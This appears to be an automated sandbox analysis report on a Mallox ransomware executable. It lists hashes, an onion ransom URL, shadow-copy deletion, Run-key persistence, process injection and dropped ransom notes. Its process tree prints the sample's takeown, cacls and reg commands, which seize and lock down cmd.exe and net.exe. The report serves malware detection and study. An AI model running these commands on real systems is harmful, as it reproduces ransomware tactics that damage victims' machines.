Analysis
max time kernel: 154s
max time network: 149s
platform: windows10-1703_x64
resource: win10-20220812-en
resource tags: arch:x64, arch:x86, image:win10-20220812-en, locale:en-us, os:windows10-1703-x64, system
submitted: 24-11-2022 15:40
Static task: static1
Behavioral task: behavioral1
Sample: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
Resource: win10-20220812-en
General
Target: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
Size: 7KB
MD5: 6cb1d245920799a1cc2dd8ee69e052d8
SHA1: 29ff603adab927d52c4e9ec2746857ae26bdccc0
SHA256: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3
SHA512: 3d71f7380502281fd05bb57098bddc506b000c41b1ff89572282709f0dbc2b508d2e75d2157c4562ea2f6b8e9eea42006c01d8002ba142387865856ac7c52d99
SSDEEP: 192:B/wgnOh5hs9+w226iGrk3wi3OV5Yi3zMWu3Wg:B/wgnx9+wAKwi3OVGi3zMWu3W
Malware Config
Extracted
C:\FILE RECOVERY.txt
http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin
http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion
Signatures
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Stops running service(s) (3 TTPs)
Modifies file permissions (1 TTP, 18 IoCs)
Processes: takeown.exe
pid | process
4856 | takeown.exe
4368 | takeown.exe
4880 | takeown.exe
5084 | takeown.exe
524 | takeown.exe
4900 | takeown.exe
4232 | takeown.exe
744 | takeown.exe
4396 | takeown.exe
2232 | takeown.exe
5088 | takeown.exe
4312 | takeown.exe
1824 | takeown.exe
4160 | takeown.exe
1332 | takeown.exe
2196 | takeown.exe
2360 | takeown.exe
2396 | takeown.exe
Adds Run key to start application (2 TTPs, 1 IoC)
Processes: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\Avbvlox = "\"C:\\Users\\Admin\\AppData\\Roaming\\Tntljlcbp\\Avbvlox.exe\"" | 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
Enumerates connected drives (3 TTPs, 24 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe (the process for every row below)
description | ioc
File opened (read-only) | \??\P:
File opened (read-only) | \??\S:
File opened (read-only) | \??\U:
File opened (read-only) | \??\X:
File opened (read-only) | \??\Z:
File opened (read-only) | \??\A:
File opened (read-only) | \??\H:
File opened (read-only) | \??\I:
File opened (read-only) | \??\J:
File opened (read-only) | \??\O:
File opened (read-only) | \??\Y:
File opened (read-only) | \??\T:
File opened (read-only) | \??\V:
File opened (read-only) | \??\E:
File opened (read-only) | \??\G:
File opened (read-only) | \??\K:
File opened (read-only) | \??\L:
File opened (read-only) | \??\M:
File opened (read-only) | \??\R:
File opened (read-only) | \??\B:
File opened (read-only) | \??\F:
File opened (read-only) | \??\N:
File opened (read-only) | \??\Q:
File opened (read-only) | \??\W:
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
8 | api.ipify.org
Suspicious use of SetThreadContext (1 IoC)
Processes: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
description | pid | process | target process
PID 2124 set thread context of 5036 | 2124 | 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe | 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
Drops file in Program Files directory (64 IoCs)
Processes: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe (the process for every row below)
description | ioc
File created | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\FILE RECOVERY.txt
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\FILE RECOVERY.txt
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_zh_4.4.0.v20140623020002.jar
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\uk-ua\FILE RECOVERY.txt
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nl-nl\FILE RECOVERY.txt
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_OEM_Perp-ul-oob.xrm-ms
File created | C:\Program Files\VideoLAN\VLC\locale\de\FILE RECOVERY.txt
File created | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Speech\FILE RECOVERY.txt
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_SubTest-pl.xrm-ms
File created | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\LTR\FILE RECOVERY.txt
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ar-ae\FILE RECOVERY.txt
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mac.css
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\FILE RECOVERY.txt
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\root\FILE RECOVERY.txt
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ko-kr\FILE RECOVERY.txt
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\MSQRY32.CHM
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\FILE RECOVERY.txt
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fi-fi\FILE RECOVERY.txt
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\FPA_w1\FILE RECOVERY.txt
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\EQUATION\FILE RECOVERY.txt
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_Retail-ppd.xrm-ms
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\FILE RECOVERY.txt
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-charts.xml
File created | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\FILE RECOVERY.txt
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\css\FILE RECOVERY.txt
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SATIN\FILE RECOVERY.txt
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_ja.jar
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_zh_CN.jar
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\FILE RECOVERY.txt
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_MAK_AE-ul-phn.xrm-ms
File created | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_2017.131.1904.0_neutral_~_8wekyb3d8bbwe\microsoft.system.package.metadata\FILE RECOVERY.txt
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\FILE RECOVERY.txt
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nb-no\FILE RECOVERY.txt
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\FILE RECOVERY.txt
File created | C:\Program Files\VideoLAN\VLC\plugins\logger\FILE RECOVERY.txt
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-spi-quicksearch.jar
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\FILE RECOVERY.txt
File created | C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\FILE RECOVERY.txt
File created | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\microsoft.system.package.metadata\FILE RECOVERY.txt
File opened for modification | C:\Program Files\7-Zip\Lang\el.txt
File opened for modification | C:\Program Files\7-Zip\Lang\hy.txt
File opened for modification | C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\FILE RECOVERY.txt
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-keyring.jar
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioStd2019R_Retail-pl.xrm-ms
File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TEXTCONV\FILE RECOVERY.txt
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\uk-ua\FILE RECOVERY.txt
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\FILE RECOVERY.txt
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\FILE RECOVERY.txt
File opened for modification | C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\FILE RECOVERY.txt
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\de-de\FILE RECOVERY.txt
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-fr\FILE RECOVERY.txt
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\bin\FILE RECOVERY.txt
File opened for modification | C:\Program Files\7-Zip\Lang\sv.txt
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\MANIFEST.MF
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_zh_4.4.0.v20140623020002.jar
File created | C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\FILE RECOVERY.txt
File created | C:\Program Files\VideoLAN\VLC\plugins\FILE RECOVERY.txt
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\FILE RECOVERY.txt
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-ma\FILE RECOVERY.txt
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-fr\FILE RECOVERY.txt
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\FILE RECOVERY.txt
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SPRING\FILE RECOVERY.txt
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png
File opened for modification | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml
Launches sc.exe (64 IoCs)
Sc.exe is a Windows utility to control services on the system.
Processes: sc.exe
pid | process
4240 | sc.exe
4840 | sc.exe
4504 | sc.exe
4392 | sc.exe
2428 | sc.exe
2248 | sc.exe
4024 | sc.exe
3284 | sc.exe
4580 | sc.exe
2616 | sc.exe
3444 | sc.exe
2928 | sc.exe
3360 | sc.exe
1944 | sc.exe
3316 | sc.exe
4736 | sc.exe
2516 | sc.exe
4160 | sc.exe
4428 | sc.exe
4880 | sc.exe
4508 | sc.exe
5088 | sc.exe
2224 | sc.exe
4820 | sc.exe
3196 | sc.exe
1508 | sc.exe
4960 | sc.exe
2884 | sc.exe
4808 | sc.exe
5012 | sc.exe
2016 | sc.exe
2692 | sc.exe
1280 | sc.exe
4404 | sc.exe
920 | sc.exe
4688 | sc.exe
4044 | sc.exe
4248 | sc.exe
2176 | sc.exe
4952 | sc.exe
2204 | sc.exe
1584 | sc.exe
1980 | sc.exe
4232 | sc.exe
204 | sc.exe
4692 | sc.exe
4656 | sc.exe
4376 | sc.exe
2664 | sc.exe
4896 | sc.exe
2196 | sc.exe
3848 | sc.exe
4344 | sc.exe
3304 | sc.exe
3492 | sc.exe
2036 | sc.exe
408 | sc.exe
5112 | sc.exe
1580 | sc.exe
4596 | sc.exe
1008 | sc.exe
2640 | sc.exe
3260 | sc.exe
4488 | sc.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes: vssadmin.exe
pid | process
760 | vssadmin.exe
Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
pid | process
2124 | 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
2124 | 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
2124 | 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
2124 | 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
5036 | 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
5036 | 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
Suspicious use of AdjustPrivilegeToken (14 IoCs)
Processes: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe, takeown.exe, vssvc.exe
description | pid | process
Token: SeDebugPrivilege | 2124 | 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
Token: SeTakeOwnershipPrivilege | 4160 | takeown.exe
Token: SeTakeOwnershipPrivilege | 5036 | 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
Token: SeDebugPrivilege | 5036 | 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
Token: SeBackupPrivilege | 2404 | vssvc.exe
Token: SeRestorePrivilege | 2404 | vssvc.exe
Token: SeAuditPrivilege | 2404 | vssvc.exe
Token: SeTakeOwnershipPrivilege | 4396 | takeown.exe
Token: SeTakeOwnershipPrivilege | 1332 | takeown.exe
Token: SeTakeOwnershipPrivilege | 4856 | takeown.exe
Token: SeTakeOwnershipPrivilege | 4880 | takeown.exe
Token: SeTakeOwnershipPrivilege | 4312 | takeown.exe
Token: SeTakeOwnershipPrivilege | 5084 | takeown.exe
Token: SeTakeOwnershipPrivilege | 2396 | takeown.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe, cmd.exe
Identical rows are collapsed; the count column gives how many times the row appears in the report (64 rows in total).
description | pid | process | target process | count
PID 2124 wrote to memory of 1184 | 2124 | 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe | cmd.exe | 3
PID 1184 wrote to memory of 4952 | 1184 | cmd.exe | reg.exe | 3
PID 1184 wrote to memory of 4160 | 1184 | cmd.exe | takeown.exe | 3
PID 2124 wrote to memory of 3212 | 2124 | 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe | 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe | 3
PID 2124 wrote to memory of 4984 | 2124 | 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe | 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe | 3
PID 2124 wrote to memory of 5036 | 2124 | 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe | 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe | 10
PID 1184 wrote to memory of 3920 | 1184 | cmd.exe | cmd.exe | 3
PID 1184 wrote to memory of 4488 | 1184 | cmd.exe | cacls.exe | 3
PID 1184 wrote to memory of 5112 | 1184 | cmd.exe | cmd.exe | 3
PID 1184 wrote to memory of 5088 | 1184 | cmd.exe | cacls.exe | 3
PID 1184 wrote to memory of 3596 | 1184 | cmd.exe | cmd.exe | 3
PID 1184 wrote to memory of 4436 | 1184 | cmd.exe | cacls.exe | 3
PID 1184 wrote to memory of 4668 | 1184 | cmd.exe | cmd.exe | 3
PID 1184 wrote to memory of 4732 | 1184 | cmd.exe | cacls.exe | 3
PID 1184 wrote to memory of 1012 | 1184 | cmd.exe | cmd.exe | 3
PID 1184 wrote to memory of 1016 | 1184 | cmd.exe | cacls.exe | 3
PID 5036 wrote to memory of 252 | 5036 | 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe | cmd.exe | 3
PID 5036 wrote to memory of 208 | 5036 | 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe | cmd.exe | 3
PID 5036 wrote to memory of 1608 | 5036 | 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe | cmd.exe | 3
System policy modification (1 TTP, 1 IoC)
Processes: 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" | 22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe"C:\Users\Admin\AppData\Local\Temp\22d33f1ffa8eb0c8b180c01fa01c71f5c2662bd4283eea6921c4c47772edd5b3.exe"1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Vahuygrzckill$-arab.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\cmd.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /g system:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\cmd.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g system:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress3⤵
-
    C:\Windows\SysWOW64\takeown.exe -> takeown /f C:\Windows\system32\net.exe /a
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\net.exe /g Administrators:f
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\net.exe /e /g Users:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\net.exe /e /g Administrators:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\net.exe /e /d SERVICE
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\net.exe /e /d mssqlserver
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\net.exe /e /d "network service"
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\net.exe /e /d system
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
    C:\Windows\SysWOW64\takeown.exe -> takeown /f C:\Windows\SysWOW64\net.exe /a
      - Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\net.exe /e /d system
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
    C:\Windows\SysWOW64\takeown.exe -> takeown /f C:\Windows\system32\net1.exe /a
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\net1.exe /g Administrators:f
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\net1.exe /e /g Users:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\net1.exe /e /g Administrators:r
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\net1.exe /e /d SERVICE
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\net1.exe /e /d mssqlserver
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\net1.exe /e /d "network service"
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\net1.exe /e /d system
    C:\Windows\SysWOW64\cmd.exe -> C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe -> cacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress
